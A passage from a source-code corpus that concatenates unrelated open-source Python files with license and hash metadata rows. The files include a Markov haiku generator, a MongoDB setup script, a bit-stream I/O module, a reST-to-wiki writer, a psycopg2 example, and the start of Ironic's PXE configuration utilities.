('amount', '!=', 0)])
        # If the statement row is the opening balance, clicking the view button should raise an error
with self.assertRaises(UserError):
supplier_statement_goods_init.find_source_order()
for report in list(set(supplier_statement_goods) - set(supplier_statement_goods_init)):
self.assertNotEqual(str(report.balance_amount), 'kaihe11')
report.find_source_order()
class TestPartner(TransactionCase):
def test_action_view_buy_history(self):
""" 测试 供应商购货记录(最近一年)"""
supplier_lenovo = self.env.ref('core.lenovo')
supplier_lenovo.action_view_buy_history()
        # Test the branch where the time interval is longer than one year
self.env.user.company_id.start_date = '2016-01-01'
supplier_lenovo.action_view_buy_history() | agpl-3.0 | -2,740,961,765,383,248,000 | 41.574257 | 105 | 0.598977 | false |
hailthedawn/HaikuGen | haikubot/train.py | 1 | 1282 | #builds the model from existing data
import inspect, os
import markovify
from textstat.textstat import textstat
#Read files from directory
#Add their contents to a single string
#Make a model from this string
#generate first sentence from this model
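# A minimal sketch of that flow (hypothetical corpus path, not part of the
# original script):
#
#     text = open("tests/Macbeth-Shakespeare.txt").read()
#     model = markovify.NewlineText(text)
#     line = model.make_sentence()   # may return None; callers retry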
class train():
dir=os.path.dirname(os.path.dirname(os.path.abspath(inspect.stack()[0][1])))
def __init__(self,line_limits=[5,7,5],file1=os.path.join(dir,"tests\Macbeth-Shakespeare.txt"),file2=os.path.join(dir,"tests\Wordsworth.txt")):
self.line_limits=line_limits
self.file1=file1
self.file2=file2
def main(self):
textModel = train.trainOnFiles(self)
haiku=train.genHaiku(self,textModel)
print(haiku)
    def genHaiku(self, textModel):
        # Build three lines, retrying until a sentence fits the syllable limit
        haiku = ""
        for i in range(0, 3):
            while True:
                sent = textModel.make_sentence()
                if (sent is not None) and (textstat.syllable_count(sent) < self.line_limits[i]):
                    haiku += sent + "\n"
                    break
        return haiku
    def trainOnFiles(self):
        # Concatenate both corpora and build a newline-delimited Markov model
        with open(self.file1) as f1:
            text = f1.read()
        with open(self.file2) as f2:
            text += f2.read()
        return markovify.NewlineText(text)
if __name__=="__main__":
train.main(train()) | mit | 6,718,578,018,938,595,000 | 24.66 | 146 | 0.616225 | false |
elainenaomi/sciwonc-dataflow-examples | dissertation2017/Experiment 1A/instances/10_2_workflow_full_10files_secondary_wmj_3sh_3rs_with_annot_with_proj_3s_range/init_0/DataStoreInit.py | 17 | 3106 | #!/usr/bin/env python
from pymongo import MongoClient
import pymongo
HOST = "ip-172-31-29-102.us-west-2.compute.internal:27017,ip-172-31-29-103.us-west-2.compute.internal:27017,ip-172-31-29-104.us-west-2.compute.internal:27017,ip-172-31-29-105.us-west-2.compute.internal:27017,ip-172-31-29-101.us-west-2.compute.internal:27017,ip-172-31-29-106.us-west-2.compute.internal:27017,ip-172-31-29-107.us-west-2.compute.internal:27017,ip-172-31-29-108.us-west-2.compute.internal:27017,ip-172-31-29-109.us-west-2.compute.internal:27017"
c = MongoClient('mongodb://'+HOST)
dbname = "googler"
task = "task_events"
ginfo = "general_info"
statscpumemory = "stats_cpumemory"
maxmincpumemory = "maxmin_cpumemory"
mediancpu = "median_cpu"
medianmemory = "median_memory"
tinfo = "task_events_info"
ratio = "ratio"
avgratio = "average_ratioevent"
analysis = "analysis_ratio"
db = c[dbname]
task_col = db[task]
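# The collections below hold derived results; drop and recreate them so each
# workflow run starts from a clean state.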
c[dbname].drop_collection(ginfo)
c[dbname].create_collection(ginfo)
c[dbname].drop_collection(statscpumemory)
c[dbname].create_collection(statscpumemory)
c[dbname].drop_collection(maxmincpumemory)
c[dbname].create_collection(maxmincpumemory)
c[dbname].drop_collection(mediancpu)
c[dbname].create_collection(mediancpu)
c[dbname].drop_collection(medianmemory)
c[dbname].create_collection(medianmemory)
c[dbname].drop_collection(tinfo)
c[dbname].create_collection(tinfo)
c[dbname].drop_collection(ratio)
c[dbname].create_collection(ratio)
c[dbname].drop_collection(avgratio)
c[dbname].create_collection(avgratio)
c[dbname].drop_collection(analysis)
c[dbname].create_collection(analysis)
db = c[dbname]
task_col = db[task]
ginfo_col = db[ginfo]
statscpumemory_col = db[statscpumemory]
maxmincpumemory_col = db[maxmincpumemory]
mediancpu_col = db[mediancpu]
medianmemory_col = db[medianmemory]
tinfo_col = db[tinfo]
ratio_col = db[ratio]
avgratio_col = db[avgratio]
analysis_col = db[analysis]
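# Index the fields queried downstream: the CPU/memory request values on
# task_events and the composite (_id.filepath, _id.numline) key that
# identifies a record in every output collection.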
task_col.create_index([("CPU request", pymongo.ASCENDING)])
task_col.create_index([("memory request", pymongo.ASCENDING)])
task_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
ginfo_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
statscpumemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
maxmincpumemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
mediancpu_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
medianmemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
tinfo_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
ratio_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
avgratio_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
analysis_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
c.admin.command('shardCollection', dbname+'.'+ratio, key={'event type': 1})
| gpl-3.0 | 6,459,247,221,181,400,000 | 37.345679 | 458 | 0.753059 | false |
spicerack/sage | sage/inbound.py | 1 | 2133 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sage.ansi import filter_ansi
import sage
class Line(str):
""" An individual line in sage's buffer
:attribute raw: the original 'raw' value of the line
:attribute output: output that will be sent to the client
"""
def __new__(cls, string):
line = str.__new__(cls, filter_ansi(string))
line.raw = string
line.output = string
return line
def gag(self):
""" Gag the line """
self.output = None
class Buffer(list):
""" List of all lines received since the last prompt
.. warning:: It's very import all values of Buffer are instances of
:class:`sage.inbound.Line`
"""
def __init__(self, lines):
for line in lines:
self.append(line)
def append(self, line):
""" Append a line to the buffer as a :class:`sage.inbound.Line` """
        if not isinstance(line, Line):
super(Buffer, self).append(Line(line))
else:
super(Buffer, self).append(line)
def insert(self, index, line):
""" Insert line before index as a :class:`sage.inbound.Line` """
        if not isinstance(line, Line):
super(Buffer, self).insert(index, Line(line))
else:
super(Buffer, self).insert(index, line)
def __repr__(self):
return str(self.__class__)
def receiver(lines):
""" Receives lines since the last prompt """
sage.buffer = buf = Buffer(lines)
trigs = sage.triggers.enabled
sage.triggers.in_loop = True
# run trigger matching over lines
for line in buf:
for trigger in trigs:
if trigger.enabled:
trigger.match(line)
sage.triggers.flush_set()
sage.triggers.in_loop = False
# since the prompt has already run, we execute deferred methods here
for method, args in sage._deferred:
if method is not None:
method(*args)
sage._deferred = list()
    output = [line.output for line in sage.buffer if line.output is not None]
return output
| gpl-3.0 | -5,296,257,708,037,646,000 | 25.012195 | 75 | 0.591186 | false |
HybridF5/jacket | jacket/tests/compute/unit/objects/test_dns_domain.py | 1 | 3066 | # Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from jacket.db import compute
from jacket.objects.compute import dns_domain
from jacket.tests.compute.unit.objects import test_objects
fake_dnsd = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': 0,
'domain': 'blah.example.com',
'scope': 'private',
'availability_zone': 'overthere',
'project_id': '867530niner',
}
class _TestDNSDomain(object):
@staticmethod
def _compare(test, compute, obj):
for field, value in compute.items():
test.assertEqual(compute[field], getattr(obj, field))
def test_get_by_domain(self):
with mock.patch.object(compute, 'dnsdomain_get') as get:
get.return_value = fake_dnsd
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self._compare(self, fake_dnsd, dnsd)
def test_register_for_zone(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
def test_register_for_project(self):
dns_domain.DNSDomain.register_for_project(self.context.elevated(),
'domain', 'project')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('project', dnsd.project_id)
def test_delete_by_domain(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
dns_domain.DNSDomain.delete_by_domain(self.context.elevated(),
'domain')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertIsNone(dnsd)
def test_get_all(self):
with mock.patch.object(compute, 'dnsdomain_get_all') as get:
get.return_value = [fake_dnsd]
dns_domain.DNSDomainList.get_all(self.context)
class TestDNSDomainObject(test_objects._LocalTest,
_TestDNSDomain):
pass
class TestRemoteDNSDomainObject(test_objects._RemoteTest,
_TestDNSDomain):
pass
| apache-2.0 | -4,048,126,344,891,496,400 | 35.070588 | 78 | 0.651011 | false |
SarahPythonista/acmpy | spgl/io/bitstream.py | 1 | 7580 | #!/usr/bin/env python3 -tt
"""
File: bitstream.cpp
-------------------
This file defines the ibitstream and obitstream classes.
These classes are patterned after (and, in fact, inherit from) the standard
io.BufferedReader and io.BufferedWriter classes.
The ibitstream and obitstream classes are basically the
same as the ordinary io.BufferedReader and io.BufferedWriter classes, but add the
functionality to read and write one bit at a time.
The idea is that you can substitute an ibitstream in place of an
io.BufferedReader and use the same operations (read, close, tell, etc.)
along with added member functions of readBit, rewind, and size.
Similarly, the obitstream can be used in place of io.BufferedWriter, and has
same operations (write, close, seek, etc.) along with additional
member functions writeBit and size.
There are two subclasses of ibitstream: ifbitstream and istringbitstream,
which wrap a file and an in-memory bytes buffer respectively. The
obitstream class similarly has ofbitstream and ostringbitstream as
subclasses.
Note: in keeping with the naming conventions of the Python standard library,
readBit and writeBit have been renamed as readbit and writebit
Additionally, str() in ibitstream has been removed (doesn't make much sense anyway)
and for consistency with the standard library str in obitstream has been renamed getvalue()
Usage:
To use an ifbitstream:
with ifbitstream(filename) as stream:
bit = stream.readbit()
stream.rewind()
bit = stream.readbit()
To use an ofbitstream:
with ofbitstream(filename) as stream:
stream.writebit(0)
...
To use an ostringbitstream:
with ostringbitstream() as stream:
stream.writebit(0)
...
stream.getvalue() # => b'hello world'
To use an istringbitstream:
with istringstream(b'hello world') as stream:
bit = stream.readbit()
"""
import io as _io
"""
Constant: PSEUDO_EOF
A constant representing the PSEUDO_EOF marker that you will
write at the end of your Huffman-encoded file.
"""
PSEUDO_EOF = 256
"""
Constant: NOT_A_CHAR
A constant representing an extended character that does not
actually hold a value. When you are constructing your Huffman
encoding tree, you should set the characters in each internal
node (non-leaf) to this value to explicitly mark that they are not
being used.
"""
NOT_A_CHAR = 257
NUM_BITS_IN_BYTE = 8
def get_nth_bit(pos, byte):
return (byte >> (NUM_BITS_IN_BYTE - 1 - pos)) & 1
def set_nth_bit(pos, byte):
return byte | 1 << (NUM_BITS_IN_BYTE - 1 - pos)
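# Example: bit positions are counted from the most significant end of the
# byte, so get_nth_bit(0, 0b10000000) == 1 and set_nth_bit(7, 0) == 0b00000001.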
class ibitstream(_io.BufferedReader):
def __init__(self, raw, buffer_size=_io.DEFAULT_BUFFER_SIZE):
super().__init__(raw, buffer_size)
self._fake = False
self.pos = NUM_BITS_IN_BYTE
self.current_byte = 0
self.last_tell = 0
def readbit(self):
if self.closed:
raise ValueError("ibitstream.readbit: Cannot read a bit from a stream that is not open.")
if self._fake: # Fake mode is used for autograding, and reads bytes as if they were bits
            bit = self.read(1)
if bit == 0 or bit == ord('0'):
return 0
else:
return 1
else:
# We consumed a whole byte, or the stream changed under us
if self.pos == NUM_BITS_IN_BYTE or self.last_tell != self.tell():
self.current_byte = self.read(1)
if not self.current_byte: # EOS
return PSEUDO_EOF
self.current_byte = ord(self.current_byte)
self.pos = 0
self.last_tell = self.tell()
result = get_nth_bit(self.pos, self.current_byte)
self.pos += 1
return result
def rewind(self):
if not self.seekable():
raise _io.UnsupportedOperation()
return self.seek(0) == 0
def size(self):
cur = self.tell()
self.seek(0, _io.SEEK_END)
end = self.tell()
self.seek(cur, _io.SEEK_SET)
return end
class obitstream(_io.BufferedWriter):
def __init__(self, raw, buffer_size=_io.DEFAULT_BUFFER_SIZE, always_flush=True):
super().__init__(raw, buffer_size)
self._fake = False
self.pos = NUM_BITS_IN_BYTE
self.current_byte = 0
self.last_tell = 0
self.always_flush = always_flush
def writebit(self, bit):
if bit not in (0, 1):
raise ValueError("obitstream.writebit: must pass an integer argument of 0 or 1. You passed the integer {}".format(bit))
if self.closed:
raise ValueError("obitstream.writebit: Cannot write a bit to a stream that is not open.")
if self._fake:
self.write(b'0' if bit == 0 else b'1')
if self.always_flush:
self.flush()
else:
# We wrote a whole byte, or the stream changed under us
if self.pos == NUM_BITS_IN_BYTE or self.last_tell != self.tell():
self.current_byte = 0
self.pos = 0
if bit:
self.current_byte = set_nth_bit(self.pos, self.current_byte)
if self.pos == 0 or bit: # Write the first bit, or a change from 0 to 1
if self.pos:
self.seek(-1, _io.SEEK_CUR)
self.write(bytes([self.current_byte]))
if self.always_flush:
self.flush()
self.pos += 1
self.last_tell = self.tell()
def size(self):
cur = self.tell()
self.seek(0, _io.SEEK_END)
end = self.tell()
self.seek(cur, _io.SEEK_SET)
return end
class ifbitstream(ibitstream):
def __init__(self, filename):
self.stream = _io.open(filename, 'rb')
super().__init__(self.stream)
class ofbitstream(obitstream):
def __init__(self, filename):
self.stream = _io.open(filename, 'wb')
super().__init__(self.stream)
class istringbitstream(ibitstream):
def __init__(self, string):
self.stream = _io.BytesIO(string)
super().__init__(self.stream)
def setvalue(self, string):
view = self.stream.getbuffer()
view[:] = string
class ostringbitstream(obitstream):
def __init__(self):
self.stream = _io.BytesIO()
super().__init__(self.stream)
def getvalue(self):
return self.stream.getvalue()
def print_stream(stream, count=None):
if not count:
count = stream.size()
for _ in range(count):
b = 0
for __ in range(NUM_BITS_IN_BYTE):
bit = stream.readbit()
print(bit, end='')
b *= 2
b += bit
print(" ({})".format(chr(b)))
if __name__ == '__main__':
print("First 6 bytes of this file, using ifbitstream")
with ifbitstream(__file__) as stream:
print_stream(stream, 6)
print("Writing bits to ofbitstream around /dev/null")
with ofbitstream('/dev/null') as stream:
stream.writebit(0)
stream.writebit(1)
print("Reading from in-memory istringbitstream")
with istringbitstream(b'hello') as stream:
print_stream(stream)
print("Writing `hi` into ostringbitstream")
with ostringbitstream() as stream:
for bit in map(int, '0110100001101001'):
stream.writebit(bit)
print("value is: {}".format(stream.getvalue()))
__all__ = ['ibitstream', 'obitstream', 'ifbitstream', 'ofbitstream', 'istringbitstream', 'ostringbitstream']
| mit | 6,341,815,058,728,473,000 | 31.255319 | 131 | 0.614116 | false |
wesabe/fixofx | 3rdparty/wsgi_intercept/setup_cmd/publish_docs.py | 4 | 6545 |
import re, pydoc
from distutils.cmd import Command
from distutils.errors import *
from distutils import log
from docutils.core import publish_string, publish_parts
from docutils import nodes
from docutils.nodes import SparseNodeVisitor
from docutils.writers import Writer
import wsgi_intercept
from mechanize import Browser
wiki_word_re = re.compile(r'^[A-Z][a-z]+(?:[A-Z][a-z]+)+')
class WikiWriter(Writer):
def translate(self):
visitor = WikiVisitor(self.document)
self.document.walkabout(visitor)
self.output = visitor.astext()
class WikiVisitor(SparseNodeVisitor):
"""visits RST nodes and transforms into Moin Moin wiki syntax.
swiped from the nose project, originally written by Jason Pellerin.
"""
def __init__(self, document):
SparseNodeVisitor.__init__(self, document)
self.list_depth = 0
self.list_item_prefix = None
self.indent = self.old_indent = ''
self.output = []
self.preformat = False
self.section_level = 0
def astext(self):
return ''.join(self.output)
def visit_Text(self, node):
#print "Text", node
data = node.astext()
if not self.preformat:
data = data.lstrip('\n\r')
data = data.replace('\r', '')
data = data.replace('\n', ' ')
self.output.append(data)
def visit_bullet_list(self, node):
self.list_depth += 1
self.list_item_prefix = (' ' * self.list_depth) + '* '
def depart_bullet_list(self, node):
self.list_depth -= 1
if self.list_depth == 0:
self.list_item_prefix = None
else:
self.list_item_prefix = (' ' * self.list_depth) + '* '
self.output.append('\n\n')
def visit_list_item(self, node):
self.old_indent = self.indent
self.indent = self.list_item_prefix
def depart_list_item(self, node):
self.indent = self.old_indent
def visit_literal_block(self, node):
self.output.extend(['{{{', '\n'])
self.preformat = True
def depart_literal_block(self, node):
self.output.extend(['\n', '}}}', '\n\n'])
self.preformat = False
def visit_doctest_block(self, node):
self.output.extend(['{{{', '\n'])
self.preformat = True
def depart_doctest_block(self, node):
self.output.extend(['\n', '}}}', '\n\n'])
self.preformat = False
def visit_paragraph(self, node):
self.output.append(self.indent)
def depart_paragraph(self, node):
self.output.append('\n')
if not isinstance(node.parent, nodes.list_item):
self.output.append('\n')
if self.indent == self.list_item_prefix:
# we're in a sub paragraph of a list item
self.indent = ' ' * self.list_depth
def visit_reference(self, node):
if node.has_key('refuri'):
href = node['refuri']
elif node.has_key('refid'):
href = '#' + node['refid']
else:
href = None
self.output.append('[' + href + ' ')
def depart_reference(self, node):
self.output.append(']')
def _find_header_level(self, node):
if isinstance(node.parent, nodes.topic):
h_level = 2 # ??
elif isinstance(node.parent, nodes.document):
h_level = 1
else:
assert isinstance(node.parent, nodes.section), (
"unexpected parent: %s" % node.parent.__class__)
h_level = self.section_level
return h_level
def _depart_header_node(self, node):
h_level = self._find_header_level(node)
self.output.append(' %s\n\n' % ('='*h_level))
self.list_depth = 0
self.indent = ''
def _visit_header_node(self, node):
h_level = self._find_header_level(node)
self.output.append('%s ' % ('='*h_level))
def visit_subtitle(self, node):
self._visit_header_node(node)
def depart_subtitle(self, node):
self._depart_header_node(node)
def visit_title(self, node):
self._visit_header_node(node)
def depart_title(self, node):
self._depart_header_node(node)
def visit_title_reference(self, node):
self.output.append("`")
def depart_title_reference(self, node):
self.output.append("`")
def visit_section(self, node):
self.section_level += 1
def depart_section(self, node):
self.section_level -= 1
def visit_emphasis(self, node):
self.output.append('*')
def depart_emphasis(self, node):
self.output.append('*')
def visit_literal(self, node):
self.output.append('`')
def depart_literal(self, node):
self.output.append('`')
class publish_docs(Command):
description = "publish documentation to front page of Google Code project"
user_options = [
('google-user=', None, "Google Code username"),
('google-password=', None, "Google Code password"),
]
def initialize_options(self):
self.google_user = None
self.google_password = None
def finalize_options(self):
if self.google_user is None and self.google_password is None:
raise DistutilsOptionError("--google-user and --google-password are required")
def run(self):
summary, doc = pydoc.splitdoc(wsgi_intercept.__doc__)
wikidoc = publish_string(doc, writer=WikiWriter())
print wikidoc
## Google html is so broken that this isn't working :/
# br = Browser()
# br.open('http://code.google.com/p/wsgi-intercept/admin')
# url = br.geturl()
# assert url.startswith('https://www.google.com/accounts/Login'), (
# "unexpected URL: %s" % url)
# log.info("logging in to Google Code...")
# forms = [f for f in br.forms()]
# assert len(forms)==1, "unexpected forms: %s for %s" % (forms, br.geturl())
# br.select_form(nr=0)
# br['Email'] = self.google_user
# br['Passwd'] = self.google_password
# admin = br.submit()
# url = admin.geturl()
# assert url=='http://code.google.com/p/wsgi-intercept/admin', (
# "unexpected URL: %s" % url)
# br.select_form(nr=0)
# br['projectdescription'] = wikidoc
# br.submit()
# print br.geturl()
| apache-2.0 | 7,526,757,896,328,170,000 | 31.889447 | 90 | 0.567609 | false |
kylelwm/ponus | venv/build/psycopg2/examples/mogrify.py | 5 | 1688 | # mogrify.py - test all possible simple type mogrifications
# -*- encoding: latin1 -*-
#
# Copyright (C) 2004-2010 Federico Di Gregorio <[email protected]>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details..
## put in DSN your DSN string
DSN = 'dbname=test'
## don't modify anything below this line (except for experimenting)
import sys, psycopg2
if len(sys.argv) > 1:
DSN = sys.argv[1]
print "Opening connection using dsn:", DSN
conn = psycopg2.connect(DSN)
print "Encoding for this connection is", conn.encoding
curs = conn.cursor()
curs.execute("SELECT %(foo)s AS foo", {'foo':'bar'})
curs.execute("SELECT %(foo)s AS foo", {'foo':None})
curs.execute("SELECT %(foo)s AS foo", {'foo':True})
curs.execute("SELECT %(foo)s AS foo", {'foo':42})
curs.execute("SELECT %(foo)s AS foo", {'foo':u'yatt�!'})
curs.execute("SELECT %(foo)s AS foo", {'foo':u'bar'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':'bar'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':None})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':True})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':42})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':u'yatt�!'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':u'bar'})
conn.rollback()
| mit | -3,911,824,938,929,991,000 | 34.829787 | 73 | 0.69715 | false |
openstack/ironic | ironic/common/pxe_utils.py | 1 | 53205 | #
# Copyright 2014 Rackspace, Inc
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os
import tempfile
from ironic_lib import utils as ironic_utils
import jinja2
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import fileutils
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common.glance_service import service_utils
from ironic.common.i18n import _
from ironic.common import image_service as service
from ironic.common import images
from ironic.common import kickstart_utils as ks_utils
from ironic.common import states
from ironic.common import utils
from ironic.conductor import utils as manager_utils
from ironic.conf import CONF
from ironic.drivers.modules import boot_mode_utils
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import image_cache
from ironic.drivers import utils as driver_utils
from ironic import objects
LOG = logging.getLogger(__name__)
PXE_CFG_DIR_NAME = CONF.pxe.pxe_config_subdir
DHCP_CLIENT_ID = '61' # rfc2132
DHCP_TFTP_SERVER_NAME = '66' # rfc2132
DHCP_BOOTFILE_NAME = '67' # rfc2132
DHCPV6_BOOTFILE_NAME = '59' # rfc5970
# NOTE(TheJulia): adding note for the bootfile parameter
# field as defined by RFC 5870. No practical examples seem
# available. Neither grub2 or ipxe seem to leverage this.
# DHCPV6_BOOTFILE_PARAMS = '60' # rfc5970
DHCP_TFTP_SERVER_ADDRESS = '150' # rfc5859
DHCP_IPXE_ENCAP_OPTS = '175' # Tentatively Assigned
DHCP_TFTP_PATH_PREFIX = '210' # rfc5071
DEPLOY_KERNEL_RAMDISK_LABELS = ['deploy_kernel', 'deploy_ramdisk']
RESCUE_KERNEL_RAMDISK_LABELS = ['rescue_kernel', 'rescue_ramdisk']
KERNEL_RAMDISK_LABELS = {'deploy': DEPLOY_KERNEL_RAMDISK_LABELS,
'rescue': RESCUE_KERNEL_RAMDISK_LABELS}
def get_root_dir():
"""Returns the directory where the config files and images will live."""
return CONF.pxe.tftp_root
def get_ipxe_root_dir():
return CONF.deploy.http_root
def _ensure_config_dirs_exist(task, ipxe_enabled=False):
"""Ensure that the node's and PXE configuration directories exist.
:param task: A TaskManager instance
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
"""
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
node_dir = os.path.join(root_dir, task.node.uuid)
pxe_dir = os.path.join(root_dir, PXE_CFG_DIR_NAME)
# NOTE: We should only change the permissions if the folder
# does not exist. i.e. if defined, an operator could have
# already created it and placed specific ACLs upon the folder
# which may not recurse downward.
for directory in (node_dir, pxe_dir):
if not os.path.isdir(directory):
fileutils.ensure_tree(directory)
if CONF.pxe.dir_permission:
os.chmod(directory, CONF.pxe.dir_permission)
def _link_mac_pxe_configs(task, ipxe_enabled=False):
"""Link each MAC address with the PXE configuration file.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
"""
def create_link(mac_path):
ironic_utils.unlink_without_raise(mac_path)
relative_source_path = os.path.relpath(
pxe_config_file_path, os.path.dirname(mac_path))
utils.create_link_without_raise(relative_source_path, mac_path)
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid, ipxe_enabled=ipxe_enabled)
for port in task.ports:
client_id = port.extra.get('client-id')
# Syslinux, ipxe, depending on settings.
create_link(_get_pxe_mac_path(port.address, client_id=client_id,
ipxe_enabled=ipxe_enabled))
# Grub2 MAC address only
for path in _get_pxe_grub_mac_path(port.address,
ipxe_enabled=ipxe_enabled):
create_link(path)
def _link_ip_address_pxe_configs(task, ipxe_enabled=False):
"""Link each IP address with the PXE configuration file.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:raises: FailedToGetIPAddressOnPort
:raises: InvalidIPv4Address
"""
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid,
ipxe_enabled=ipxe_enabled)
api = dhcp_factory.DHCPFactory().provider
ip_addrs = api.get_ip_addresses(task)
if not ip_addrs:
if ip_addrs == []:
LOG.warning("No IP addresses assigned for node %(node)s.",
{'node': task.node.uuid})
else:
LOG.warning(
"DHCP address management is not available for node "
"%(node)s. Operators without Neutron can ignore this "
"warning.",
{'node': task.node.uuid})
# Just in case, reset to empty list if we got nothing.
ip_addrs = []
for port_ip_address in ip_addrs:
ip_address_path = _get_pxe_ip_address_path(port_ip_address)
ironic_utils.unlink_without_raise(ip_address_path)
relative_source_path = os.path.relpath(
pxe_config_file_path, os.path.dirname(ip_address_path))
utils.create_link_without_raise(relative_source_path,
ip_address_path)
def _get_pxe_grub_mac_path(mac, ipxe_enabled=False):
root_dir = get_ipxe_root_dir() if ipxe_enabled else get_root_dir()
yield os.path.join(root_dir, "%s-%s-%s" %
("grub.cfg", "01", mac.replace(':', "-").lower()))
yield os.path.join(root_dir, mac + '.conf')
def _get_pxe_mac_path(mac, delimiter='-', client_id=None,
ipxe_enabled=False):
"""Convert a MAC address into a PXE config file name.
:param mac: A MAC address string in the format xx:xx:xx:xx:xx:xx.
:param delimiter: The MAC address delimiter. Defaults to dash ('-').
    :param client_id: client_id indicates an InfiniBand port.
        Defaults to None (Ethernet).
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: the path to the config file.
"""
mac_file_name = mac.replace(':', delimiter).lower()
if not ipxe_enabled:
hw_type = '01-'
if client_id:
hw_type = '20-'
mac_file_name = hw_type + mac_file_name
return os.path.join(get_root_dir(), PXE_CFG_DIR_NAME,
mac_file_name)
return os.path.join(get_ipxe_root_dir(), PXE_CFG_DIR_NAME,
mac_file_name)
def _get_pxe_ip_address_path(ip_address):
"""Convert an ipv4 address into a PXE config file name.
:param ip_address: A valid IPv4 address string in the format 'n.n.n.n'.
:returns: the path to the config file.
"""
# grub2 bootloader needs ip based config file name.
return os.path.join(
CONF.pxe.tftp_root, ip_address + ".conf"
)
def get_kernel_ramdisk_info(node_uuid, driver_info, mode='deploy',
ipxe_enabled=False):
"""Get href and tftp path for deploy or rescue kernel and ramdisk.
:param node_uuid: UUID of the node
:param driver_info: Node's driver_info dict
:param mode: A label to indicate whether paths for deploy or rescue
ramdisk are being requested. Supported values are 'deploy'
'rescue'. Defaults to 'deploy', indicating deploy paths will
be returned.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: a dictionary whose keys are deploy_kernel and deploy_ramdisk or
rescue_kernel and rescue_ramdisk and whose values are the
absolute paths to them.
Note: driver_info should be validated outside of this method.
"""
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
image_info = {}
labels = KERNEL_RAMDISK_LABELS[mode]
for label in labels:
image_info[label] = (
str(driver_info[label]),
os.path.join(root_dir, node_uuid, label)
)
return image_info
def get_pxe_config_file_path(node_uuid, ipxe_enabled=False):
"""Generate the path for the node's PXE configuration file.
:param node_uuid: the UUID of the node.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: The path to the node's PXE configuration file.
"""
if ipxe_enabled:
return os.path.join(get_ipxe_root_dir(), node_uuid, 'config')
else:
return os.path.join(get_root_dir(), node_uuid, 'config')
def get_file_path_from_label(node_uuid, root_dir, label):
"""Generate absolute paths to various images from their name(label)
This method generates absolute file system path on the conductor where
various images need to be placed. For example the kickstart template, file
and stage2 squashfs.img needs to be placed in the ipxe_root_dir since they
will be transferred by anaconda ramdisk over http(s). The generated paths
will be added to the image_info dictionary as values.
:param node_uuid: the UUID of the node
:param root_dir: Directory in which the image must be placed
:param label: Name of the image
"""
if label == 'ks_template':
